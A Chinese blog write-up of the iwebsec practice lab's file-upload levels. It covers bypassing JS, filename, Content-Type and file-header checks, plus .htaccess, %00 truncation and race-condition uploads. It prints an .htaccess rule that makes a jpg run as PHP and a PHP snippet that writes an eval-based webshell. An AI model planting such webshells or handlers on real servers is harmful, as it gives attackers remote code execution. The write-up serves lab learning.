iwebsec--文件上传

已于 2022-11-23 10:41:27 修改
阅读量772 收藏 2
点赞数 2
分类专栏: iwebsec 文章标签: 安全
于 2022-11-21 21:22:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58380360/article/details/127960307
版权

文件上传漏洞

文章目录

01-前端JS过滤绕过

在这里插入图片描述

        function checkFile() {
            var file = document.getElementsByName('upfile')[0].value;
            if (file == null || file == "") {
                alert("你还没有选择任何文件,不能上传!");
                return false;
            }
            //定义允许上传的文件类型
            var allow_ext = ".jpg|.jpeg|.png|.gif|.bmp|";
            //提取上传文件的类型
            var ext_name = file.substring(file.lastIndexOf("."));
            //alert(ext_name);
            //alert(ext_name + "|");
            //判断上传文件类型是否允许上传
            if (allow_ext.indexOf(ext_name + "|") == -1) {
                var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
                alert(errMsg);
                return false;
            }
        }

代码审计:允许上传的文件类型.jpg|.jpeg|.png|.gif|.bmp|,没有php,的后缀名
在这里插入图片描述
上传一个.jpg
在这里插入图片描述

02-文件名过滤绕过

在这里插入图片描述
在这里插入图片描述
修改文件后缀muma1.jpg,找到路径
在这里插入图片描述
在这里插入图片描述
上传成功

03-Content-Type过滤绕过

在这里插入图片描述
把原来的content-type修改为image/jpeg
在这里插入图片描述

04-文件头过滤绕过

在这里插入图片描述
头部添加GIF89a
在这里插入图片描述

05-.htaccess文件上传

.htaccess是伪静态文件,代码中包含将muma4.jpg解析为php,能过被中间件所识别运行

<FilesMatch "muma4.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

在这里插入图片描述

06-文件截断上传

由于00代表结束符,所以会把00后面的所有字段删除
截断条件:php版本小于5.4.3,并且PHP中的magic_quotes_gpc为OFF状态
把整个文件名muma5.php换成muma5.php%001.jpg
在这里插入图片描述
成功上传
在这里插入图片描述
这里出现软件的问题并没又连接成功,%00编码==》转换为url编码,知道大体思路就行

07-条件竞争文件上传

网站是允许任意上传文件的,如果包含WebShell脚本,则立刻删除,当muma6.php执行的时候,就会立刻生成shell.php,虽然muma6.php会被删除,但是纯在一个短的时间差,执行检查文件和删除文件,这时shell.php上传成功

<?php 
fputs(fopen('../shell.php','w'),'<?php @eval($_POST[muma])?>');
?>
不见星光见月光
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php 远程包含文件漏洞分析第1/6页
10-29
首先,我们来讨论包含文件漏洞,首先要问的是,什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这...
第38天:WEB漏洞-反序列化之PHP&JAVA全解(下)1
08-03
标题中的“WEB漏洞-反序列化之PHP&JAVA全解(下)”指的是关于Web应用程序安全领域的一个重要话题,即PHP和JAVA平台上的反序列化漏洞。反序列化漏洞是由于程序在处理序列化数据时没有充分验证输入,从而允许攻击者构造...
iwebsec靶场(文件上传
果粒程
02-26 1496
iwebsec靶场(文件上传
iwebsec 文件上传篇(已完结)
qq_60829702的博客
03-29 683
iwebsec文件上传篇,已完结。后续会继续更新后面的部分
iwebsec靶场文件上传漏洞-.htaccess文件上传
qq_56041380的博客
03-28 1186
.htaccess文件上传是利用.htaccess文件对Web服务器进行配置的功能,实现将扩展名为.jpg、.png等的文件当做PHP文件解析的过程
iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传
最新发布
mooyuan的博客
04-21 1048
通过对iwebsec靶场文件上传的第七关卡讲解条件竞争法实现文件上传的方法,通过python脚本配合burpsuite工具实现渗透过程。
iwebsec靶场 文件上传漏洞通关笔记4-文件头过滤绕过
mooyuan的博客
04-20 730
文件上传漏洞通常是由于程序员在对代码中文件上传部分的控制不足或者处理缺陷,而导致黑客可以越过其本身权限向服务器上上传可执行的恶意脚本文件。本次通过iwebsec靶场文件上传的第四关来讲解如何通过图片马实现文件头绕过过滤。
Jboss&Weblogic.zip
10-11
【Jboss&Weblogic.zip】这个压缩包文件主要聚焦于两个知名的Java应用服务器:JBoss和WebLogic,以及与它们相关的渗透测试和安全工具。在IT行业中,应用服务器是用于托管企业级Java应用程序的平台,而渗透测试是评估...
LKWA靶场算是DVWA进阶吧
09-24
LKWA靶场 包含以下漏洞: - Blind RCE - XSSI - PHAR Deserialization - PHP Object Injection - PHP Object Injection via Cookies - PHP Object Injection (Object Reference) - SSRF - Variables variable
iwebsec靶场 文件上传漏洞通关笔记6-文件截断上传
mooyuan的博客
04-21 990
通过对iwebsec第六关卡讲解文件截断绕过的文件上传漏洞利用方法。magic_quotes_gpc函数在php中的作用是判断解析用户提示的数据,如包括有:post、get、cookie过来的数据增加转义字符“\”,对POST、POST、__GET以及进行数据库操作的sql进行转义处理,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误,可以防止sql注入。
iwebsec靶场 文件上传漏洞通关笔记1-第01关 前端js过滤绕过
mooyuan的博客
12-04 1939
第01关 前端js过滤绕过1.禁用js法(1)禁用js(2)刷新页面使生效(3)上传脚本(4)开启js并刷新页面2.修改页面法1(1)右键查询元素(2)搜索关键字check(3)删除函数调用(4)上传脚本 (5)访问脚本3.bp改包法(1)分析源码(2)将脚本后缀改为jpg(3)上传info.jpg并bp抓包(4)bp中将info.jpg改名为info.php并发送(5)访问脚本打开第一关靶场iwebsec 靶场漏洞库iwebsechttp://iwebsec.com:81/upload/01.php构
iwebsec文件上传漏洞-前端JS过滤绕过
qq_56041380的博客
03-27 856
前端JS过滤绕过的原理是:应用程序是在前端通过JS代码进行验证,而不是在程序后端进行验证,这样攻击者就可以通过修改前端JS代码绕过上传过滤,上传木马。
iwebsec靶场 文件上传漏洞通关笔记5-.htaccess过滤绕过
mooyuan的博客
04-20 1244
htaccess文件全称是超文本入口,提供了针对目录改变配置的方法,即在一个特定的文档目录中放置一个包含一个或多个指令的文件,以作用于此目录及其所有子目录。htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。上传.htaccess文件,来绕过黑名单。(2)如何配置使.htaccess生效。
文件上传漏洞 | iwebsec
weixin_52116519的博客
11-21 455
JavaScript会检测上传文件的后缀是否可以上传,检测过程中上传文件的数据包并不会发送到服务端,只是在客户端浏览器使用JavaScript对数据包进行检测。它用来告诉服务端如何处理请求的数据,以及告诉客户端(一般是浏览器)如何解析响应的数据,比如显示图片,解析并展示html等等。文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。的验证机制,这种方法利用每一个特定类型的文件都会有不太一样的开头或者标志位来表明它们的文件类型。文件被删除,我们还有新写入的马子。
CTF学习笔记21:iwebsec-文件上传漏洞-06-文件截断上传
lvx++的博客
03-18 1216
一、通过burpsuite改扩展名等方法不能上传 二、用burpsuite配合%00上传 (一)在前缀框输入:6.php%00,如果为空则上传文件保存为"_随机数字+.jpg"的图片文件 (二)在filename处也加入%00.gif (三)在path段,选中%00右击,选择URL-decode,否则会将%00作为普通字符处理 (四)点击forward上传成功 (五)虽然提示路和文件名中包含随机数字和jpg,但实际上传的文件名仅为6.php 三、测试连接 测试连接成功 ...
iwebsec靶场文件上传漏洞-竞争条件文件上传
qq_56041380的博客
03-30 778
竞争条件是指多个线程在没有进行锁操作或者同步操作的情况下同时访问同一个共享代码、变量、文件等,运行的结果依赖于不同线程访问数据的顺序。源码分析。
CTF学习笔记17:iwebsec-文件上传漏洞-02-文件名过滤绕过
lvx++的博客
02-20 1494
一、将文件扩展名改为.phP即可上传 上传路径为up/2.phP 二、测试连接
iwebsec靶场文件上传漏洞-文件截断上传
qq_56041380的博客
03-29 342
产生文件截断上传漏洞的主要原因就是存在%00这个字符,当PHP的版本低于5.3.4时,会把它当做结束符,导致后面的数据直接被忽略,造成文件上传被截断。上传时,如果上传文件时可控的,可以通过%00截断进行木马上传。
iwebsec靶场搭建
07-28
iwebsec靶场是一个漏洞集成容器,其中集成了大量的web漏洞环境,包括SQL注入、文件包含、命令执行、XXE、反序列化、SSRF、XSS、文件上传等常见的漏洞环境。\[1\] 要搭建iwebsec靶场,可以使用docker来运行容器。可以使用以下命令来启动靶场并将宿主机的8001端口映射给iwebsec靶场的80服务: docker run --restart=always --name iwebsec -it -dp 8001:80 iwebsec/iwebsec \[2\] 这样每次启动靶场时,都会自动运行,并且宿主机的8001端口会映射给靶场的80服务。 需要注意的是,iwebsec靶场还包含一些漏洞渗透,如redis数据库漏洞和MySQL数据库漏洞。如果需要进行渗透测试,需要将iwebsec靶场中的redis服务端口号和MySQL服务端口号映射到主机端口中。可以使用以下命令来查找iwebsec的配置文件: find / -name iwebsec_info.md \[3\] #### 引用[.reference_title] - *1* [Web安全 iwebsec 靶场搭建.](https://blog.csdn.net/weixin_54977781/article/details/130341391)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [iwebsec靶场搭建](https://blog.csdn.net/mooyuan/article/details/128031434)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值